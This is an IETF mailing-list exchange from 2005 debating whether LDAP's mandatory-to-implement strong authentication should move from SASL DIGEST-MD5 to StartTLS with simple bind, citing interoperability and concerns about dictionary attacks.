Re: authmeth-15: mandatory-to-implement strong authentication

It's my personally opinion that the mandatory-to-implement
"strong" authentication mechanism must provide adequate
protect against hijack attacks.  That is, must provide a
data integrity service.

It's also my personal opinion that adequate interoperability
between LDAP clients and servers using DIGEST-MD5 security
layers does not exist.  It is also my understanding that
the DIGEST-MD5 specification is undergoing significant
redesign (requiring implementation changes).

I agree with Mark that adequate interoperability does exist
between LDAP clients using Start TLS and simple bind.
It my understanding that the revised TLS specification
is readily movable to Draft Standard status (that is,
it will move faster than the revised LDAP TS).

Hence, I support changing LDAP's mandatory-to-implement
"strong" authentication mechanism to be StartTLS+simple.

I recommend that we remove all DIGEST-MD5 requirements from
authmeth (and the LDAP TS) such that the normative reference
to the DIGEST-MD5 specification can be removed.  While it
might be desirable to RECOMMEND implementations support
DIGEST-MD5, I rather word this an a manner that doesn't
require a normative reference to DIGEST-MD5.  For instance:
        In the Changes:
                Changed LDAP's mandatory-to-implement
                "strong" authentication mechanism from
                SASL/DIGEST-MD5 to StartTLS+simple (as
                discussed in Section X.Y).  Implementators
                are encouraged to continue supporting
                SASL/DIGEST-MD5 [DIGEST-MD5].

Kurt



At 04:41 PM 9/22/2005, Mark Ennis wrote:
>Roger,
>
>I get the impression from this mesage that the SASL DIGEST-MD5 security layers 
>are being proposed as mandatory to implement in authmeth. It was my 
>understanding that only the SASL DIGEST-MD5 authentication mechanism was to be 
>mandatory to implement. If we are going to require a mandatory to implement 
>security layer in authmeth then I think it should be startTLS not SASL 
>DIGEST-MD5 as, in my experience, startTLS is far more common in both client 
>and server implementations. Then, if we have a mandatory to implement security 
>layer, it removes the need for a challenge response autentication method being 
>mandatory to implement as the IESG security requirements are met by simple 
>authentication over TLS.
>
>- Mark.
>
>Roger Harrison wrote:
>>
>>There was considerable discussion at the IETF 63 meeting regarding recent 
>>research into challenge-response protocols (such as DIGEST-MD5) being 
>>vulnerable to off-line dictionary attacks (see 
>>_/http://www3.ietf.org/proceedings/05aug/minutes/sasl.html/_ and 
>>_/http://www3.ietf.org/proceedings/05aug/slides/apparea-4/sld1.htm/_ ).
>>One proposal was to recommend performing challenge-response authentication 
>>over TLS-protected connections.  If we moved this dirction, then requiring 
>>the use of DIGEST-MD5 security layers seems redundant.
>>What effect, if any, does this have on our use of DIGEST-MD5 as the 
>>mandatory-to-implement strong authentication mechanism for LDAP?
>>Roger